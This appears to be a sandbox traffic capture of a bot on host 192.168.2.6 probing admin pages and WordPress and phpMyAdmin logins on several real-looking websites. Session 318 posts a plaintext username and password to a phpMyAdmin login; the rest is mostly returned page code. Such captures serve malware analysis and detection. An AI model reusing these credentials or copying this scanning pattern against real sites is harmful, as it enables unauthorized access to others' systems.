2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 Data Ascii: uery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js
2024-02-20 23:26:24 UTC	1369	IN	Data Raw: 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 69 6e 64 65 78 65 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 63 6f 6d 6d 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 70 61 67 65 5f 73 65 74 74 69 6e 67 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 Data Ascii: X.fireOnload('navigation.js'); AJAX.fireOnload('indexes.js'); AJAX.fireOnload('common.js'); AJAX.fireOnload('page_settings.js'); AJAX.fireOnload('vendor/tracekit.js'); AJAX.fireOnload('error_report.js'); A

Session ID	Source IP	Source Port	Destination IP	Destination Port
317	192.168.2.6	59421	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	171	OUT	GET /admin HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:23 UTC	220	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://www.stylesense.co.uk/admin
2024-02-20 23:26:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
318	192.168.2.6	59397	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	390	OUT	POST /phpMyAdmin/index.php?route=/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=ija2a2tqnubgbv7hafhlghd0t3; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://amsantechnology.com/phpMyAdmin/ Content-Length: 150 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:23 UTC	150	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 33 31 36 37 37 63 37 33 35 65 37 39 34 38 33 34 34 37 32 65 33 64 37 37 36 34 37 63 34 32 36 39 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 69 6a 61 32 61 32 74 71 6e 75 62 67 62 76 37 68 61 66 68 6c 67 68 64 30 74 33 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 73 61 6e 74 6f 73 68 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 65 64 65 34 64 65 6c 65 63 35 61 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=31677c735e794834472e3d77647c4269&set_session=ija2a2tqnubgbv7hafhlghd0t3&pma_username=santosh&pma_password=ede4delec5a&server=1
2024-02-20 23:26:24 UTC	1379	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:24 GMT Server: Apache X-ob_mode: 1 X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow Expires: Tue, 20 Feb 2024 23:26:24 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: phpMyAdmin_https=3t8l8h4vno028gf9v2p6sbikqj; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Set-Cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpMyAdmin/; secure Last-Modified: Tue, 20 Feb 2024 23:26:24 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
2024-02-20 23:26:24 UTC	6813	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 2000<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:24 UTC	1385	IN	Data Raw: 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 Data Ascii: er.regional[''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please
2024-02-20 23:26:24 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:24 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 Data Ascii: 2000$.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u00
2024-02-20 23:26:24 UTC	6	IN	Data Raw: 20 20 20 20 20 20 Data Ascii:
2024-02-20 23:26:24 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:24 UTC	2380	IN	Data Raw: 39 34 30 0d 0a 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 73 22 3e 45 73 70 61 26 6e 74 69 6c 64 65 3b 6f 6c 20 2d 20 53 70 61 6e 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 73 76 22 3e 53 76 65 6e 73 6b 61 20 2d 20 53 77 65 64 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 74 72 22 3e 54 26 75 75 6d 6c 3b 72 6b 26 63 63 65 64 69 6c 3b 65 20 2d 20 54 75 72 6b 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 Data Ascii: 940 <option value="es">Español - Spanish</option> <option value="sv">Svenska - Swedish</option> <option value="tr">Türkçe - Turkish</option> <option value="

Session ID	Source IP	Source Port	Destination IP	Destination Port
319	192.168.2.6	59567	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	183	OUT	GET /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5377 date: Tue, 20 Feb 2024 23:26:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:24 UTC	5377	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
320	192.168.2.6	59688	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	181	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	355	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2ppcq4e78r9u2d410k2iavqo3n; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: /
2024-02-20 23:26:24 UTC	11	IN	Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
321	192.168.2.6	59728	45.147.96.4	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	168	OUT	GET / HTTP/1.1 Host: www.glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	449	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Link: <https://www.glazing-bt.com/wp-json/>; rel="https://api.w.org/" Link: <https://www.glazing-bt.com/wp-json/wp/v2/pages/7>; rel="alternate"; type="application/json" Link: <https://www.glazing-bt.com/>; rel=shortlink Strict-Transport-Security: max-age=31536000
2024-02-20 23:26:24 UTC	15935	IN	Data Raw: 66 65 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 Data Ascii: fedf<!DOCTYPE html><html lang="fr-FR" class="no-js" itemscope itemtype="https://schema.org/WebPage"><head><meta charset="UTF-8" />... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id
2024-02-20 23:26:24 UTC	16384	IN	Data Raw: 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2d 66 72 6f 6e 74 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2f 69 6e 63 6c 75 64 65 73 2f 2e 2e 2f 63 73 73 2f 66 72 6f 6e 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 30 2e 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6a 73 5f Data Ascii: 7' type='text/css' media='all' /><link rel='stylesheet' id='cookie-notice-front-css' href='https://www.glazing-bt.com/wp-content/plugins/cookie-notice/includes/../css/front.min.css?ver=6.0.7' type='text/css' media='all' /><link rel='stylesheet' id='js_
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 74 74 6f 6d 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 3e 20 75 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 3b Data Ascii: ttom}#Top_bar .menu > li > ul.mfn-megamenu-bg > li{background:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li a{border:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li > ul{background:none!important;-webkit-box-shadow:0 0 0 0;-moz-box-shadow:0 0 0 0;
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 20 30 20 32 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 23 6c 6f 67 6f 2c 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 2e 63 75 73 74 6f 6d 2d 6c 6f 67 6f 2d 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 6f 67 6f 2d 6e 6f 2d 73 74 69 63 6b 79 2d 70 61 64 64 69 6e 67 20 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 54 6f 70 Data Ascii: 0 20px;padding:0}#Top_bar.is-sticky #logo,#Top_bar.is-sticky .custom-logo-link{padding:5px 0!important;height:50px!important;line-height:50px!important}.logo-no-sticky-padding #Top_bar.is-sticky #logo{height:60px!important;line-height:60px!important}#Top
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 70 61 67 65 2d 70 61 72 65 6e 74 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 0d 0a 66 66 64 31 0d 0a 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 61 6e 63 65 73 74 6f 72 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 Data Ascii: > a,.menu-highlight #Top_bar #menu > ul > li.current-menu-parent > a,.menu-highlight #Top_bar #menu > ul > li.current-page-parent > a,.menu-highlight #Top_bar #menu >ffd1 ul > li.current-menu-ancestor > a,.menu-highlight #Top_bar #menu > ul > li.curre
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 34 37 33 33 36 34 34 33 34 34 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 34 37 33 33 36 34 34 33 34 34 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e Data Ascii: round-position: 0 0 !important;background-repeat: no-repeat !important;}.vc_custom_1647336443442{background-position: 0 0 !important;background-repeat: no-repeat !important;}.vc_custom_1647336443442{background-position: 0 0 !important;background-repeat: n
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 2d 6c 61 7a 79 6c 6f 61 64 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 32 36 31 22 20 64 61 74 61 2d 6c 61 7a 79 6c 6f 61 64 3d 22 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 72 65 73 65 61 75 2d 6e 61 74 69 6f 6e 61 6c 2e 70 6e 67 22 20 64 61 74 61 2d 6e 6f 2d 72 65 74 69 6e 61 3e 20 0a 09 09 09 09 09 09 09 3c 2f 72 73 2d 6c 61 79 65 72 3e 3c 21 2d 2d 0a 0a 09 09 09 09 09 09 09 2d 2d 3e 3c 72 73 2d 6c 61 79 65 72 0a 09 09 09 09 09 09 09 09 69 64 3d 22 73 6c 69 64 65 72 2d 32 2d 73 6c 69 64 65 2d 32 2d 6c 61 79 65 72 2d 31 34 22 20 0a 09 09 09 09 09 09 09 09 64 61 74 61 2d 74 79 70 65 3d 22 69 6d 61 67 65 22 0a 09 09 09 09 09 09 09 09 64 61 74 61 2d 72 73 70 Data Ascii: -lazyload" width="300" height="261" data-lazyload="//www.glazing-bt.com/wp-content/uploads/reseau-national.png" data-no-retina> </rs-layer>...--><rs-layerid="slider-2-slide-2-layer-14" data-type="image"data-rsp
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 5f 66 69 67 75 72 65 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 63 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 2d 77 72 61 70 70 65 72 20 20 20 76 63 5f 62 6f 78 5f 62 6f 72 64 65 72 5f 67 72 65 79 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 33 30 31 22 20 68 65 69 67 68 74 3d 22 35 35 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 69 63 6f 6e 73 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 76 63 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 2d 69 6d 67 20 61 74 74 61 63 68 6d 65 6e 74 2d 66 75 6c 6c 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 Data Ascii: _figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="301" height="55" src="https://www.glazing-bt.com/wp-content/uploads/glazing-icons.png" class="vc_single_image-img attachment-full" alt="" loading="lazy" srcset="https://www
